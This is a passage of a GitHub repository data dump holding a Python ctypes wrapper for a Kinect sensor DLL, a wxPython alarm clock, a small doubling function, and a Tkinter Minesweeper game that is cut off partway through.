"text": "# ################################################\r\n# Copyright (c) 2017 by Yoshihisa Nitta\r\n# Released under the MIT License\r\n# http://opensource.org/licenses/mit-license.php\r\n# ################################################\r\n\r\n# NtKinect.py version 0.1 2017/11/08\r\n# http://nw.tsuda.ac.jp/lec/NtKinectDLL/\r\n#\r\n# requires:\r\n# NtKinectDLL version 1.2.5 or later\r\n\r\nfrom ctypes import *\r\n\r\n# ##############\r\n# Constants\r\n# ##############\r\n# Number\r\nbodyCount = 6\r\njointCount = 25\r\nrgbCols = 1920\r\nrgbRows = 1080\r\ndepthCols = 512\r\ndepthRows = 424\r\n# JointType\r\nJointType_SpineBase= 0\r\nJointType_SpineMid= 1\r\nJointType_Neck= 2\r\nJointType_Head= 3\r\nJointType_ShoulderLeft= 4\r\nJointType_ElbowLeft= 5\r\nJointType_WristLeft= 6\r\nJointType_HandLeft= 7\r\nJointType_ShoulderRight= 8\r\nJointType_ElbowRight= 9\r\nJointType_WristRight= 10\r\nJointType_HandRight= 11\r\nJointType_HipLeft= 12\r\nJointType_KneeLeft= 13\r\nJointType_AnkleLeft= 14\r\nJointType_FootLeft= 15\r\nJointType_HipRight= 16\r\nJointType_KneeRight= 17\r\nJointType_AnkleRight= 18\r\nJointType_FootRight= 19\r\nJointType_SpineShoulder= 20\r\nJointType_HandTipLeft= 21\r\nJointType_ThumbLeft= 22\r\nJointType_HandTipRight= 23\r\nJointType_ThumbRight= 24\r\n# TrackingState\r\nTrackingState_NotTracked= 0\r\nTrackingState_Inferred= 1\r\nTrackingState_Tracked= 2\r\n# FacePoint\r\nFacePointType_None= -1\r\nFacePointType_EyeLeft= 0\r\nFacePointType_EyeRight= 1\r\nFacePointType_Nose= 2\r\nFacePointType_MouthCornerLeft= 3\r\nFacePointType_MouthCornerRight= 4\r\nFacePointType_Count= FacePointType_MouthCornerRight + 1\r\n# a_FaceProperty\r\nFaceProperty_Happy= 0\r\nFaceProperty_Engaged= 1\r\nFaceProperty_WearingGlasses= 2\r\nFaceProperty_LeftEyeClosed= 3\r\nFaceProperty_RightEyeClosed= 4\r\nFaceProperty_MouthOpen= 5\r\nFaceProperty_MouthMoved= 6\r\nFaceProperty_LookingAway= 7\r\nFaceProperty_Count= FaceProperty_LookingAway + 1\r\n# FaceDetectionResult\r\nDetectionResult_Unknown= 0\r\nDetectionResult_No= 1\r\nDetectionResult_Maybe= 2\r\nDetectionResult_Yes= 3\r\n# HDFace\r\nHDFaceVerticesSize = 1347\r\n\r\n# ##################\r\n# DLL Functions\r\n# ################\r\nnt=windll.LoadLibrary('NtKinectDLL.dll')\r\nnt.getKinect.argtypes = (None)\r\nnt.getKinect.restype = c_void_p\r\nnt.stopKinect.argtypes=[c_void_p]\r\nnt.stopKinect.restype = None\r\n# OpenCV\r\nnt.imshow.argtypes=[c_void_p]\r\nnt.imshow.restype=None\r\nnt.imshowBlack.argtypes=[c_void_p]\r\nnt.imshowBlack.restype=None\r\n# CoordinateMapper\r\nnt.mapCameraPointToColorSpace.argtypes=[c_void_p,POINTER(c_float),POINTER(c_float),c_int]\r\nnt.mapCameraPointToColorSpace.restype=None\r\nnt.mapCameraPointToDepthSpace.argtypes=[c_void_p,POINTER(c_float),POINTER(c_float),c_int]\r\nnt.mapCameraPointToDepthSpace.restype=None\r\nnt.mapDepthPointToColorSpace.argtypes=[c_void_p,POINTER(c_float),POINTER(c_ushort),POINTER(c_float),c_int]\r\nnt.mapDepthPointToColorSpace.restype=None\r\nnt.mapDepthPointToCameraSpace.argtypes=[c_void_p,POINTER(c_float),POINTER(c_ushort),POINTER(c_float),c_int]\r\nnt.mapDepthPointToCameraSpace.restype=None\r\n# Multi Thread\r\nnt.acquire.argtypes=[c_void_p]\r\nnt.acquire.restype=None\r\nnt.release.argtypes=[c_void_p]\r\nnt.release.restype=None\r\n# 
Audio\r\nnt.setAudio.argtypes=[c_void_p,c_bool]\r\nnt.setAudio.restype=None\r\nnt.getBeamAngle.argtypes=[c_void_p]\r\nnt.getBeamAngle.restype=c_float\r\nnt.getBeamAngleConfidence.argtypes=[c_void_p]\r\nnt.getBeamAngleConfidence.restype=c_float\r\nnt.getAudioTrackingId.argtypes=[c_void_p] # assumed signature, mirroring the nt.getAudioTrackingId(kinect) call in setAudio() below\r\nnt.getAudioTrackingId.restype=c_uint64 # without an explicit restype, ctypes would default to c_int and truncate the 64-bit tracking id\r\nnt.openAudio.argtypes=[c_void_p,c_char_p]\r\nnt.openAudio.restype=None\r\nnt.closeAudio.argtypes=[c_void_p]\r\nnt.closeAudio.restype=None\r\nnt.isOpenedAudio.argtypes=[c_void_p]\r\nnt.isOpenedAudio.restype=c_bool\r\n# RGB\r\nnt.setRGB.argtypes=[c_void_p]\r\nnt.setRGB.restype=None\r\nnt.getRGB.argtypes=[c_void_p,POINTER(c_ubyte)]\r\nnt.getRGB.restype=c_int\r\n# Depth\r\nnt.setDepth.argtypes=[c_void_p]\r\nnt.setDepth.restype=None\r\nnt.getDepth.argtypes=[c_void_p,POINTER(c_ushort)]\r\nnt.getDepth.restype=c_int\r\n# Infrared\r\nnt.setInfrared.argtypes=[c_void_p]\r\nnt.setInfrared.restype=None\r\nnt.getInfrared.argtypes=[c_void_p,POINTER(c_ushort)]\r\nnt.getInfrared.restype=c_int\r\n# BodyIndex\r\nnt.setBodyIndex.argtypes=[c_void_p]\r\nnt.setBodyIndex.restype=None\r\nnt.getBodyIndex.argtypes=[c_void_p,POINTER(c_ubyte)]\r\nnt.getBodyIndex.restype=c_int\r\n# Skeleton\r\nnt.setSkeleton.argtypes=[c_void_p]\r\nnt.setSkeleton.restype=None\r\nnt.getSkeleton.argtypes=[c_void_p,POINTER(c_float),POINTER(c_int),POINTER(c_int),POINTER(c_uint64)]\r\nnt.getSkeleton.restype=c_int\r\nnt.handState.argtypes=[c_void_p,c_int,c_bool]\r\nnt.handState.restype=c_int\r\n# Face\r\nnt.setFace.argtypes=[c_void_p,c_bool]\r\nnt.setFace.restype=None\r\nnt.getFace.argtypes=[c_void_p,POINTER(c_float),POINTER(c_float),POINTER(c_float),POINTER(c_int),POINTER(c_uint64)]\r\nnt.getFace.restype=c_int\r\n# HDFace\r\nnt.setHDFace.argtypes=[c_void_p]\r\nnt.setHDFace.restype=None\r\nnt.getHDFace.argtypes=[c_void_p,POINTER(c_float),POINTER(c_uint64),POINTER(c_int)]\r\nnt.getHDFace.restype=c_int\r\n# Gesture\r\nnt.setGestureFile.argtypes=[c_void_p,c_wchar_p]\r\nnt.setGestureFile.restype=None\r\nnt.setGesture.argtypes=[c_void_p]\r\nnt.setGesture.restype=None\r\nnt.getDiscreteGesture.argtypes=[c_void_p,POINTER(c_int),POINTER(c_float),POINTER(c_uint64)]\r\nnt.getDiscreteGesture.restype=c_int\r\nnt.getContinuousGesture.argtypes=[c_void_p,POINTER(c_int),POINTER(c_float),POINTER(c_uint64)]\r\nnt.getContinuousGesture.restype=c_int\r\nnt.getGidMapSize.argtypes=(None)\r\nnt.getGidMapSize.restype=c_int\r\n# Video\r\nnt.openVideo.argtypes=[c_void_p,c_wchar_p]\r\nnt.openVideo.restype=None\r\nnt.writeVideo.argtypes=[c_void_p]\r\nnt.writeVideo.restype=None\r\nnt.closeVideo.argtypes=[c_void_p]\r\nnt.closeVideo.restype=None\r\n\r\n# ###################\r\n# Python Variables\r\n# ###################\r\nkinect = nt.getKinect()\r\n\r\nbeamAngle = c_float(0.0)\r\nbeamAngleConfidence = c_float(0.0)\r\naudioTrackingId = c_uint64(0)\r\n\r\nrgbImage = (c_ubyte * 4 * rgbCols * rgbRows)()\r\np_rgbImage = cast(rgbImage,POINTER(c_ubyte))\r\n\r\ndepthImage = (c_ushort * depthCols * depthRows)()\r\np_depthImage = cast(depthImage,POINTER(c_ushort))\r\n\r\ninfraredImage = (c_ushort * depthCols * depthRows)()\r\np_infraredImage = cast(infraredImage,POINTER(c_ushort))\r\n\r\nbodyIndexImage = (c_ubyte * depthCols * depthRows)()\r\np_bodyIndexImage = cast(bodyIndexImage,POINTER(c_ubyte))\r\n\r\nskeleton = []\r\nskeletonState = []\r\nskeletonId = []\r\nskeletonTrackingId = []\r\n\r\nskel = (c_float * 3 * jointCount * bodyCount)()\r\np_skel = cast(skel,POINTER(c_float))\r\nskelState = (c_int * jointCount * bodyCount)()\r\np_skelState = cast(skelState,POINTER(c_int))\r\nskelId = (c_int * jointCount * bodyCount)()\r\np_skelId = 
cast(skelId,POINTER(c_int))\r\nskelTrackingId = (c_uint64 * jointCount * bodyCount)()\r\np_skelTrackingId = cast(skelTrackingId,POINTER(c_uint64))\r\n\r\nfacePoint = []\r\nfaceRect = []\r\nfaceDirection = []\r\nfaceProperty = []\r\nfaceTrackingId = []\r\n\r\nfcPoint = (c_float * 3 * FacePointType_Count * bodyCount)()\r\np_fcPoint = cast(fcPoint,POINTER(c_float))\r\nfcRect = (c_float * 4 * bodyCount)()\r\np_fcRect = cast(fcRect,POINTER(c_float))\r\nfcDirection = (c_float * 3 * bodyCount)()\r\np_fcDirection = cast(fcDirection,POINTER(c_float))\r\nfcProperty = (c_int * FaceProperty_Count * bodyCount)()\r\np_fcProperty = cast(fcProperty,POINTER(c_int))\r\nfcTrackingId = (c_uint64 * bodyCount)()\r\np_fcTrackingId = cast(fcTrackingId,POINTER(c_uint64))\r\n\r\nhdfacePoint = (c_float * 3 * HDFaceVerticesSize * bodyCount)()\r\np_hdfacePoint = cast(hdfacePoint,POINTER(c_float))\r\nhdfaceTrackingId = (c_uint64 * bodyCount)()\r\np_hdfaceTrackingId = cast(hdfaceTrackingId,POINTER(c_uint64))\r\nhdfaceStatus = (c_int * 2 * bodyCount)()\r\np_hdfaceStatus = cast(hdfaceStatus,POINTER(c_int))\r\n\r\ndiscreteGesture = []\r\ngestureConfidence = []\r\ndiscreteGestureTrackingId = []\r\ncontinuousGesture = []\r\ngestureProgress = []\r\ncontinuousGestureTrackingId = []\r\n\r\ngstId = (c_int * (100 * bodyCount))()\r\np_gstId = cast(gstId, POINTER(c_int))\r\ngstFloat = (c_float * (100 * bodyCount))()\r\np_gstFloat = cast(gstFloat,POINTER(c_float))\r\ngstTrackingId = (c_uint64 * (100 * bodyCount))()\r\np_gstTrackingId = cast(gstTrackingId,POINTER(c_uint64))\r\n\r\n\r\n# ###################\r\n# Python Functions\r\n# ###################\r\n\r\ndef stopKinect():\r\n nt.stopKinect(kinect)\r\n \r\ndef imshow():\r\n nt.imshow(kinect)\r\ndef imshowBlack():\r\n nt.imshowBlack(kinect)\r\n\r\ndef mapCameraPointToColorSpace(skel,color,n):\r\n return nt.mapCameraPointToColorSpace(kinect,skel,color,n)\r\ndef mapCameraPointToDepthSpace(skel,color,n):\r\n return nt.mapCameraPointToDepthSpace(kinect,skel,color,n)\r\ndef mapDepthPointToColorSpace(depth,dth,color,n):\r\n return nt.mapDepthPointToColorSpace(kinect,depth,dth,color,n)\r\ndef mapDepthPointToCameraSpace(depth,dth,skel,n):\r\n return nt.mapDepthPointToCameraSpace(kinect,depth,dth,skel,n)\r\n\r\ndef acquire():\r\n nt.acquire(kinect)\r\ndef release():\r\n nt.release(kinect)\r\n\r\ndef setAudio(flag):\r\n global beamAngle, beamAngleConfidence, audioTrackingId\r\n nt.setAudio(kinect,flag)\r\n beamAngle = nt.getBeamAngle(kinect)\r\n beamAngleConfidence = nt.getBeamAngleConfidence(kinect)\r\n audioTrackingId = nt.getAudioTrackingId(kinect)\r\ndef openAudio(filename):\r\n nt.openAudio(kinect,filename)\r\ndef closeAudio():\r\n nt.closeAudio(kinect)\r\ndef isOpenedAudio():\r\n return nt.isOpenedAudio(kinect)\r\n\r\ndef setRGB():\r\n nt.setRGB(kinect)\r\n return getRGB()\r\ndef getRGB():\r\n return nt.getRGB(kinect, p_rgbImage)\r\n\r\ndef setDepth():\r\n nt.setDepth(kinect)\r\n return getDepth()\r\ndef getDepth():\r\n return nt.getDepth(kinect,p_depthImage)\r\n\r\ndef setInfrared():\r\n nt.setInfrared(kinect)\r\n return getInfrared()\r\ndef getInfrared():\r\n return nt.getInfrared(kinect,p_infraredImage)\r\n\r\ndef setBodyIndex():\r\n nt.setBodyIndex(kinect)\r\n return getBodyIndex()\r\ndef getBodyIndex():\r\n return nt.getBodyIndex(kinect,p_bodyIndexImage)\r\n\r\ndef setSkeleton():\r\n nt.setSkeleton(kinect)\r\n return getSkeleton()\r\ndef getSkeleton():\r\n global skeleton, skeletonState, skeletonId, skeletonTrackingId\r\n n = 
nt.getSkeleton(kinect,p_skel,p_skelState,p_skelId,p_skelTrackingId)\r\n    if (n == 0):\r\n        skeleton = []\r\n        skeletonState = []\r\n        skeletonId = []\r\n        skeletonTrackingId = []\r\n        return n\r\n    skeleton = (c_float * 3 * jointCount * n)()\r\n    skeletonState = (c_int * jointCount * n)()\r\n    skeletonId = (c_int * jointCount * n)()\r\n    skeletonTrackingId = (c_uint64 * jointCount * n)()\r\n    for i in range(n):\r\n        for j in range(jointCount):\r\n            skeleton[i][j][0] = skel[i][j][0]\r\n            skeleton[i][j][1] = skel[i][j][1]\r\n            skeleton[i][j][2] = skel[i][j][2]\r\n        skeletonId[i] = skelId[i]\r\n        skeletonTrackingId[i] = skelTrackingId[i]\r\n    return n\r\ndef setFace():\r\n    nt.setFace(kinect, c_bool(True))\r\n    return getFace()\r\nfaceFailCount = 0\r\ndef getFace():\r\n    global faceFailCount, facePoint, faceRect, faceDirection, faceProperty, faceTrackingId\r\n    n = nt.getFace(kinect,p_fcPoint,p_fcRect,p_fcDirection,p_fcProperty,p_fcTrackingId)\r\n    if (n == 0):\r\n        faceFailCount = faceFailCount + 1\r\n        if faceFailCount < 10:\r\n            return 0\r\n    else:\r\n        faceFailCount = 0\r\n    facePoint = (c_float * 3 * FacePointType_Count * n)()\r\n    faceRect = (c_float * 4 * n)()\r\n    faceDirection = (c_float * 3 * n)()\r\n    faceProperty = (c_int * FaceProperty_Count * n)()\r\n    faceTrackingId = (c_uint64 * n)()\r\n    for i in range(n):\r\n        for j in range(FacePointType_Count):\r\n            facePoint[i][j][0] = fcPoint[i][j][0]\r\n            facePoint[i][j][1] = fcPoint[i][j][1]\r\n        for j in range(4):\r\n            faceRect[i][j] = fcRect[i][j]\r\n        for j in range(3):\r\n            faceDirection[i][j] = fcDirection[i][j]\r\n        for j in range(FaceProperty_Count):\r\n            faceProperty[i][j] = fcProperty[i][j]\r\n        faceTrackingId[i] = fcTrackingId[i]\r\n    return n\r\n\r\ndef setHDFace():\r\n    nt.setHDFace(kinect)\r\n    return getHDFace()\r\ndef getHDFace():\r\n    return nt.getHDFace(kinect,p_hdfacePoint,p_hdfaceTrackingId,p_hdfaceStatus)\r\n\r\ndef setGestureFile(filename):\r\n    nt.setGestureFile(kinect,filename) # the DLL entry takes the kinect handle first (argtypes=[c_void_p,c_wchar_p])\r\ndef setGestureId(name,id):\r\n    return nt.setGestureId(kinect,name,id)\r\ndef setGesture():\r\n    nt.setGesture(kinect)\r\ndef getDiscreteGesture():\r\n    global gstId, p_gstId, gstFloat, p_gstFloat, gstTrackingId, p_gstTrackingId\r\n    global discreteGesture, gestureConfidence, discreteGestureTrackingId\r\n    mapSize = nt.getGidMapSize()\r\n    size = bodyCount * mapSize\r\n    if len(gstId) < mapSize:\r\n        gstId = (c_int * (mapSize * bodyCount))()\r\n        p_gstId = cast(gstId, POINTER(c_int))\r\n        gstFloat = (c_float * (mapSize * bodyCount))()\r\n        p_gstFloat = cast(gstFloat,POINTER(c_float))\r\n        gstTrackingId = (c_uint64 * (mapSize * bodyCount))()\r\n        p_gstTrackingId = cast(gstTrackingId,POINTER(c_uint64))\r\n    n = nt.getDiscreteGesture(kinect,p_gstId,p_gstFloat,p_gstTrackingId)\r\n    discreteGesture = (c_int * n)()\r\n    gestureConfidence = (c_float * n)()\r\n    discreteGestureTrackingId = (c_uint64 * n)()\r\n    for i in range(n):\r\n        discreteGesture[i] = gstId[i]\r\n        gestureConfidence[i] = gstFloat[i]\r\n        discreteGestureTrackingId[i] = gstTrackingId[i]\r\n    return n\r\ndef getContinuousGesture():\r\n    global gstId, p_gstId, gstFloat, p_gstFloat, gstTrackingId, p_gstTrackingId\r\n    global continuousGesture, gestureProgress, continuousGestureTrackingId\r\n    mapSize = nt.getGidMapSize()\r\n    size = bodyCount * mapSize\r\n    if len(gstId) < mapSize:\r\n        gstId = (c_int * (mapSize * bodyCount))()\r\n        p_gstId = cast(gstId, POINTER(c_int))\r\n        gstFloat = (c_float * (mapSize * bodyCount))()\r\n        p_gstFloat = cast(gstFloat,POINTER(c_float))\r\n        gstTrackingId = (c_uint64 * (mapSize * bodyCount))()\r\n        p_gstTrackingId = 
cast(gstTrackingId,POINTER(c_uint64))\r\n    n = nt.getContinuousGesture(kinect,p_gstId,p_gstFloat,p_gstTrackingId)\r\n    continuousGesture = (c_int * n)()\r\n    gestureProgress = (c_float * n)()\r\n    continuousGestureTrackingId = (c_uint64 * n)()\r\n    for i in range(n):\r\n        continuousGesture[i] = gstId[i]\r\n        gestureProgress[i] = gstFloat[i]\r\n        continuousGestureTrackingId[i] = gstTrackingId[i]\r\n    return n\r\n\r\ndef openVideo(filename):\r\n    nt.openVideo(kinect,filename)\r\ndef writeVideo():\r\n    nt.writeVideo(kinect)\r\ndef closeVideo():\r\n    nt.closeVideo(kinect)\r\n\r\n\r\ndef doJob(n):\r\n    for x in range(n):\r\n        setRGB()\r\n        setSkeleton()\r\n        setFace()\r\n        imshowBlack()\r\n    stopKinect()\r\n"
}
] | 5 |
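A minimal driving sketch for the NtKinect.py wrapper above (not from the repo): it needs a Kinect v2 sensor and NtKinectDLL.dll on the DLL search path, since `import NtKinect` opens the device at import time, and the trailing count argument of the mapper is assumed to be the number of points converted.

```python
from ctypes import POINTER, c_float, cast

import NtKinect as nt  # the wrapper module above; opens the sensor on import

n = nt.setSkeleton()  # capture a frame and copy out up to bodyCount skeletons
if n > 0:
    # camera-space x, y, z of the first body's head joint
    head = (c_float * 3)(*nt.skeleton[0][nt.JointType_Head])
    pixel = (c_float * 2)()  # receives the color-space coordinates
    nt.mapCameraPointToColorSpace(cast(head, POINTER(c_float)),
                                  cast(pixel, POINTER(c_float)), 1)
    print('head joint maps to color pixel', pixel[0], pixel[1])
nt.stopKinect()
```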
Daredoom/Sveglia-raspberry
|
https://github.com/Daredoom/Sveglia-raspberry
|
57322b8eb0f3a32c10b6fef42e9ff2ad0a7fa4a3
|
226afd592a537817e45be3d532904d4b44021c60
|
b2c48eee5bd0354f6273e9d2110e4966127122f8
|
refs/heads/master
| 2021-01-01T20:49:10.521984 | 2019-10-14T06:54:59 | 2019-10-14T06:54:59 | 98,936,389 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5765027403831482,
"alphanum_fraction": 0.5939890742301941,
"avg_line_length": 31.105262756347656,
"blob_id": "5a2c316b08431bacab25aca899a8bb1924a4f6cc",
"content_id": "6684e0346c6dd456e64ec2121367d642be46a9f5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1830,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 57,
"path": "/Sveglia.py",
"repo_name": "Daredoom/Sveglia-raspberry",
"src_encoding": "UTF-8",
"text": "import datetime\nimport wx\n\n\nclass sveglia(wx.Frame):\n\n def __init__(self):\n wx.Frame.__init__(self, parent=None, title=\"Sveglia\", id=-1)\n self.frequenza = 99.4\n font = wx.Font(30, wx.DECORATIVE, wx.ITALIC, wx.NORMAL)\n\n self.orologio = wx.StaticText(self, -1, label=(datetime.datetime.now().strftime(\"%A %d-%m-%y %H:%M:%S\")))\n self.orologio.SetFont(font)\n\n self.lblfrequenza = wx.StaticText(self, -1, label=str(self.frequenza))\n self.lblfrequenza.SetFont(font)\n\n sizer = wx.GridSizer(1, 2, 5, 5)\n sizer.Add(self.orologio, 0, wx.ALL | wx.CENTRE | wx.ALIGN_CENTER_HORIZONTAL | wx.ALIGN_CENTRE_VERTICAL)\n sizer.Add(self.lblfrequenza, 1, wx.ALL | wx.CENTRE | wx.ALIGN_CENTER_HORIZONTAL | wx.ALIGN_CENTRE_VERTICAL)\n self.SetSizer(sizer)\n\n self.update()\n self.Fit()\n\n self.Bind(wx.EVT_KEY_DOWN, self.onKey)\n self.Bind(wx.EVT_KEY_DOWN, self.cambiaVolume)\n self.ShowFullScreen(True)\n\n def cambiaFrequenza(self, evt):\n keyCode = evt.GetKeyCode()\n # print(keyCode)\n if keyCode == 43:\n self.frequenza += 0.1\n self.lblfrequenza.SetLabel(\"{0:0.1f}\".format(self.frequenza))\n elif keyCode == 45:\n self.frequenza -= 0.1\n self.lblfrequenza.SetLabel(\"{0:0.1f}\".format(self.frequenza))\n else:\n evt.Skip()\n\n def onKey(self, evt):\n key_code = evt.GetKeyCode()\n if key_code == wx.WXK_ESCAPE:\n self.Destroy()\n else:\n evt.Skip()\n\n def update(self):\n current_time = datetime.datetime.strftime(datetime.datetime.now(), '%A %d-%m-%Y %H:%M:%S')\n self.orologio.SetLabel(current_time)\n wx.CallLater(1000, self.update)\n\napp = wx.App(False)\nbase = sveglia()\nbase.Show()\napp.MainLoop()\n"
}
] | 1 |
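Sveglia.update() above drives the clock with a self-rescheduling `wx.CallLater` rather than a timer thread, which keeps all widget updates on the GUI thread. A stripped-down sketch of that pattern (assuming wxPython 4.x):

```python
import datetime
import wx

class Clock(wx.Frame):
    def __init__(self):
        super().__init__(None, title='Clock')
        self.label = wx.StaticText(self, label='')
        self.tick()

    def tick(self):
        self.label.SetLabel(datetime.datetime.now().strftime('%H:%M:%S'))
        wx.CallLater(1000, self.tick)  # re-arm one second later on the event loop

app = wx.App(False)
Clock().Show()
app.MainLoop()
```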
JavWil/mynewrep
|
https://github.com/JavWil/mynewrep
|
ac8e8da91e44db4338d84d49f2a168b62bb4cd11
|
436d610dad19c0e1019a081be32c557ce77334e9
|
154390d44df186bb17d8ade254718385c4e27458
|
refs/heads/master
| 2020-06-08T11:24:04.441500 | 2019-06-22T11:22:37 | 2019-06-22T11:22:37 | 193,220,768 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6645962595939636,
"alphanum_fraction": 0.6708074808120728,
"avg_line_length": 16.88888931274414,
"blob_id": "096832b766d2f1ee720c8715dc71ee1ba0921d6d",
"content_id": "2021e2671bc16e7d939b9bbd615df1095973cce6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 161,
"license_type": "permissive",
"max_line_length": 47,
"num_lines": 9,
"path": "/func.py",
"repo_name": "JavWil/mynewrep",
"src_encoding": "UTF-8",
"text": "\"\"\" \nCreate a function that doubles the input number\n-----\nParams: var any numerical vaule\nreturn: a doubled number\n\"\"\"\n\ndef double(var):\n return var * 2\n"
}
] | 1 |
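The docstring above spells out the parameter and return value; a quick usage check (hypothetical, assuming func.py is on the import path):

```python
from func import double

assert double(2) == 4
assert double(1.5) == 3.0  # works for floats too, since * is generic
```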
tfisz/Minesweeper
|
https://github.com/tfisz/Minesweeper
|
d12eb8e38a19de01169faa32288400d64e7798d9
|
fe60f26d857d6efdaacd18843f5d32cd8ea06626
|
3645b95ced0b9420801ee17c3d7d7000391297be
|
refs/heads/master
| 2022-11-13T07:09:06.684635 | 2020-06-19T09:06:32 | 2020-06-19T09:06:32 | 273,447,126 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7549019455909729,
"alphanum_fraction": 0.7549019455909729,
"avg_line_length": 16.08333396911621,
"blob_id": "8739f46087bf74455db71d5d3b52a375def00b83",
"content_id": "e7b1c7c13fd567ba0c397f3695d54477b22445b3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 204,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 12,
"path": "/main.py",
"repo_name": "tfisz/Minesweeper",
"src_encoding": "UTF-8",
"text": "from minesweeper import *\n\nglobal root\n# create Tk widget\nroot = Tk()\n# set program title\nroot.title(\"Minesweeper\")\n# create game instance\nminesweeper = Minesweeper(root)\n\n# run event loop\nroot.mainloop()"
},
{
"alpha_fraction": 0.5075933933258057,
"alphanum_fraction": 0.5284311771392822,
"avg_line_length": 43.379310607910156,
"blob_id": "96f41e08e33f534ed2a5755aa28bbf204e3dce48",
"content_id": "13cd9862ff9419d94c5a805b76c8d213136729a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14188,
"license_type": "no_license",
"max_line_length": 161,
"num_lines": 319,
"path": "/minesweeper.py",
"repo_name": "tfisz/Minesweeper",
"src_encoding": "UTF-8",
"text": "from map import*\nfrom tkinter import messagebox\nfrom tkinter import *\nimport time\nimport threading\n\nSZEROKOSC: int = 16\nWYSOKOSC: int = 16\nLICZBA_MIN: int = 40\n\n\nclass Minesweeper:\n def __init__(self, root):\n with open(\"statystyki.txt\", 'r') as statystyki:\n self.lista_wynikow = [int(i) for i in statystyki] # wygrane / przegrane / czas\n\n self.root = root\n root.title(\"Minesweeper!\")\n\n menu = Menu(root)\n root.config(menu=menu)\n game_menu = Menu(menu)\n menu.add_cascade(label=\"Gra\", menu=game_menu)\n game_menu.add_command(label=\"Nowa\", command=self.reset)\n game_menu.add_command(label=\"Statystyki\", command=self.stats)\n game_menu.add_command(label=\"Wyjdź\", command=root.destroy)\n\n self.mapa = Mapa(WYSOKOSC, SZEROKOSC)\n self.mapa.wyznacz_mape(WYSOKOSC, SZEROKOSC, LICZBA_MIN)\n\n frame = Frame(root)\n frame.pack()\n\n self.zakryte = PhotoImage(file=\"zakryte.png\")\n self.puste = PhotoImage(file=\"puste.png\")\n self.bomba = PhotoImage(file=\"bomba.png\")\n self.flaga = PhotoImage(file=\"flaga.png\")\n self.brak_bomby = PhotoImage(file=\"brak_bomby.png\")\n self.numery = []\n for x in range(1, 9):\n self.numery.append(PhotoImage(file=str(x) + \".png\"))\n\n self.buttons = dict({})\n self.odkrytePola = 0\n self.postawioneFlagi = 0\n self.czyRozpoczeta = FALSE\n self.Czas = 0\n self.poczatkowyCzas = int(time.clock())\n self.odwiedzone = []\n\n x_coord, y_coord = 0, 0\n for i in range(WYSOKOSC*SZEROKOSC):\n\n if self.mapa.dane[x_coord][y_coord].sasiedzi == 9:\n mina = 1\n else:\n mina = 0\n\n # ustawiamy grafikę\n gfx = self.zakryte\n\n # 0 = Button widget\n # 1 = jeśli mina t/n (1/0)\n # 2 = stan (0 = niekliknięty, 1 = kliknięty, 2 = oflagowany)\n # 3 = id buttona\n # 4 = [x, y] położenie na planszy\n # 5 = sąsiedztwo\n self.buttons[i] = [Button(frame, image=gfx),\n mina,\n 0,\n i,\n [x_coord, y_coord],\n self.mapa.dane[x_coord][y_coord].sasiedzi]\n self.buttons[i][0].bind('<Button-1>', self.lclicked_wrapper(i))\n self.buttons[i][0].bind('<Button-3>', self.rclicked_wrapper(i))\n self.buttons[i][0].bind('<Double-Button-1>', self.dclicked_wrapper(i))\n # kalkulacja położenia\n x_coord += 1\n if x_coord == SZEROKOSC:\n x_coord = 0\n y_coord += 1\n\n # umieszczamy buttony na layoucie\n for key in self.buttons:\n self.buttons[key][0].grid(row=self.buttons[key][4][1], column=self.buttons[key][4][0])\n\n # dodajemy timer i licznik flag\n self.label2 = Label(frame, text=\"Czas: 0\")\n self.label2.grid(row=WYSOKOSC, column=0, columnspan=3)\n\n self.label3 = Label(frame, text=\"Pozostało: \" + str(LICZBA_MIN-self.postawioneFlagi))\n self.label3.grid(row=WYSOKOSC, column=SZEROKOSC-3, columnspan=3)\n\n def lclicked_wrapper(self, key):\n return lambda Button: self.lclicked(self.buttons[key])\n\n def rclicked_wrapper(self, key):\n return lambda Button: self.rclicked(self.buttons[key])\n\n def dclicked_wrapper(self, key):\n return lambda Button: self.dclicked(self.buttons[key])\n\n def lclicked(self, button_data):\n if button_data[1] == 1: # jeśli mina\n # pokaż wszystkie miny\n for key in self.buttons:\n if self.buttons[key][1] != 1 and self.buttons[key][2] == 2:\n self.buttons[key][0].config(image=self.brak_bomby)\n if self.buttons[key][1] == 1 and self.buttons[key][2] != 2:\n self.buttons[key][0].config(image=self.bomba)\n # koniec gry\n self.przegrana()\n elif button_data[1] == 0 and button_data[2] == 0:\n # zmień ikonę\n if self.czyRozpoczeta == FALSE:\n self.czyRozpoczeta = TRUE\n t = threading.Thread(target=self.timer)\n t.start()\n\n if button_data[5] == 0:\n 
self.czysc_puste(button_data[3], TRUE)\n else:\n button_data[0].config(image=self.numery[button_data[5] - 1])\n button_data[2] = 1\n self.odkrytePola += 1\n\n if self.odkrytePola == WYSOKOSC*SZEROKOSC - LICZBA_MIN:\n self.wygrana()\n\n def rclicked(self, button_data):\n # jeśli niekliknięte, stawiamy flagę\n if button_data[2] == 0:\n button_data[0].config(image=self.flaga)\n button_data[2] = 2\n button_data[0].unbind('<Button-1>')\n\n self.postawioneFlagi += 1\n self.update_flags()\n # jeśli oflagowane, zabieramy flagę\n elif button_data[2] == 2:\n button_data[0].config(image=self.zakryte)\n button_data[2] = 0\n button_data[0].bind('<Button-1>', self.lclicked_wrapper(button_data[3]))\n\n self.postawioneFlagi -= 1\n self.update_flags()\n\n def dclicked(self, button_data): # funkcja, która po podwójnym klkiknięciu sprawdza czy liczba otaczających flag\n # zgadza się z grafiką po czym odkrywa otoczenie pola\n if button_data[2] == 1 and button_data[5] != 0:\n x_coord, y_coord = button_data[4]\n flag_counter = 0\n for key in self.buttons:\n if self.buttons[key][4] == [x_coord - 1, y_coord - 1] and self.buttons[key][2] == 2:\n flag_counter += 1\n if self.buttons[key][4] == [x_coord, y_coord - 1] and self.buttons[key][2] == 2:\n flag_counter += 1\n if self.buttons[key][4] == [x_coord + 1, y_coord - 1] and self.buttons[key][2] == 